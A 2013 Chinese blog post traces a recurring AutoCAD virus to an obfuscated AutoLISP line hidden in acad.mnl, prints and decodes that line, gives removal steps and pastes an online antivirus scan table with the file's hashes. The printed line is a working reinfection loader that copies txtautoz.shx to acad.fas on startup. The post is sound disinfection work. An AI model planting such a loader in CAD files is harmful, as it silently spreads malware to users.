新浪博客

终于找出acad.fas的原头了。

2013-01-03 15:37阅读:
cad文件打开一直被报有病毒,每次只能清除acad.fas文件,一直未找到源头。用cad专杀也可以找到cad病毒,便总清不干净,打开acad.mnl文件发现下面有一段这样的文字。
;; Silent load. (princ)
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))
根据把数字按ASCII码反查询数字就是以下的内容
(if(null autodeskwybs)(if(findfile(vl-list->string '(txtautoz.shx)))(vl-file-copy (findfile(vl-list->string '(txtautoz.shx)))(vl-list->string '(acad.fas))))(princ))
删除以上的代码,并删除电脑上所有txtautoz.shx的文件,打开cad就不会再报有病毒了。
以下是根据virscan.org网站报的病毒情况。让大家看看........
文件名称 : acad.fas (本站不提供任何文件的下载服务)
文件大小 :
21513 byte
文件类型 : data
MD5 : 655cad31000dac2ddaa8952094d7f839
SHA1 : a656c817da49520ba834157d8f232023936bf0ce

扫描结果
扫描结果 : 54%的杀软(20/37)报告发现病毒
时间 : 2012/10/22 12:40:33 (CST)
软件名称 ↓ 引擎版本 病毒库版本 病毒库时间 扫描结果 时间
a-squared 5.1.0.4 20121022110432 2012-10-22 Trojan.Acad!IK
9.209
AntiVir 8.2.10.150 7.11.41.132 2012-09-01 -
0.183
Arcavir 2011 201210191434 2012-10-19 -
2.640
Authentium 5.1.1 201209090949 2012-09-09 -
1.442
AVAST! 4.7.4 121021-1 2012-10-21 Other:Malware-gen [Trj]
0.166
AVG 12.0.1794 2441/5346 2012-10-21 -
0.241
BitDefender 7.90123.7700255 7.43765 2012-10-22 Worm.Acad.Kenilfe.D
4.172
ClamAV 0.97.5 15484 2012-10-22 Trojan.Acad-2
0.176
Comodo 5.1 13938 2012-10-21 UnclassifiedMalware
2.209
CP Secure 1.3.0.5 2012.10.22 2012-10-22 -
0.167
Dr.Web 7.0.4.9250 2012.10.21 2012-10-21 -
14.862
F-Prot 4.6.2.117 20121021 2012-10-21 -
0.964
F-Secure 7.02.73807 2012.10.21.02 2012-10-21 Worm.Acad.Kenilfe.D [Aquarius]
2.451
GData 22.6473 20121022 2012-10-22 Worm.Acad.Kenilfe.D [Engine:A]
5.687
Ikarus T3.1.32.20.0 2012.10.21.82553 2012-10-21 Trojan.Acad
7.182
Microsoft 1.8904 2012.10.21 2012-10-21 Worm:ALisp/Kenilfe.D
6.021
NOD32 3.0.21 7611 2012-10-21 ACAD/Qfas.NAA trojan
0.170
Norman 6.8.3 201208311030 2012-08-31 -
0.000
nProtect 20121021.01 12257405 2012-10-21 Worm.Acad.Kenilfe.D
1.691
Quick Heal 11.00 2012.10.21 2012-10-21 Trojan.Acad.Fas
0.956
Sophos 3.35.1 4.81 2012-10-22 AL/Bursted-AC
5.366
Sunbelt 3.9.2551.2 13630 2012-10-21 -
1.311
The Hacker 6.8.0.0 v00115 2012-10-21 -
0.628
VBA32 3.12.18.1 20121019.1936 2012-10-19 -
3.367
ViRobot 20121020 2012.10.20 2012-10-20 -
0.362
VirusBuster 5.5.2.13 15.0.232.0/10078077 2012-10-21

我的更多文章

下载客户端阅读体验更佳

APP专享